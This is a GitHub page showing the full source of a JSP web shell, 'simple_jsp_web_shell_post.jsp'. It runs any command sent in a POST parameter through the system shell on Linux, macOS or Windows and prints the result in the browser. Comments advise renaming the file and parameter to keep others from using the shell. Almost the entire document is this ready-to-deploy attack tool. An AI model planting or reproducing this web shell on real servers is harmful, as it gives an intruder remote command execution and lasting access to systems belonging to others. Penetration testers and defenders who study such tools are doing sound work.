-
Notifications
You must be signed in to change notification settings - Fork 8
/
simple_jsp_web_shell_post.jsp
75 lines (69 loc) · 3.17 KB
/
simple_jsp_web_shell_post.jsp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
<%@page import="java.util.Arrays"%>
<%@page import="java.io.IOException"%>
<%@page import="java.nio.charset.StandardCharsets"%>
<%@page import="java.io.InputStream"%>
<%-- Copyright (c) 2021 Ivan Šincek --%>
<%-- v3.0 --%>
<%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
<%-- Works on Linux OS, macOS, and Windows OS. --%>
<%-- modify the script name and request parameter name to random ones to prevent others form accessing and using your web shell --%>
<%-- don't forget to change the script name in the action attribute --%>
<%
// your parameter/key here
String parameter = "command";
String output = "";
if (request.getMethod() == "POST" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) {
String os = System.getProperty("os.name").toUpperCase();
String shell = null;
if (os.contains("LINUX") || os.contains("MAC")) {
shell = "/bin/sh -c";
} else if (os.contains("WIN")) {
shell = "cmd.exe /c";
} else {
output = "SYS_ERROR: Underlying operating system is not supported\n";
}
if (shell != null) {
Process process = null;
InputStream stdout = null;
byte[] buffer = null;
try {
process = Runtime.getRuntime().exec(String.format("%s \"(%s) 2>&1\"", shell, request.getParameter(parameter).trim()));
stdout = process.getInputStream();
buffer = new byte[1024];
int bytes = 0;
do {
bytes = stdout.read(buffer, 0, buffer.length);
if (bytes > 0) {
output += new String(buffer, 0, bytes, StandardCharsets.UTF_8);
}
} while (bytes > 0);
output = output.replace("<", "<");
output = output.replace(">", ">");
} catch (IOException ex) {
output = String.format("ERROR: %s\n", ex);
} finally {
if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} stdout = null; }
if (process != null) { process.destroy(); process = null; }
if (buffer != null) { Arrays.fill(buffer, (byte)0); buffer = null; }
}
}
// if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
// out.print("<pre>" + output + "</pre>"); output = null; System.gc();
}
%>
<%@page contentType="text/html" pageEncoding="UTF-8"%>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Simple JSP Web Shell</title>
<meta name="author" content="Ivan Šincek">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<form method="post" action="./simple_jsp_web_shell_post.jsp">
<input name="<% out.print(parameter); %>" type="text" required="required" autofocus="autofocus" placeholder="Enter Command">
</form>
<pre><% out.print(output); output = null; System.gc(); %></pre>
</body>
</html>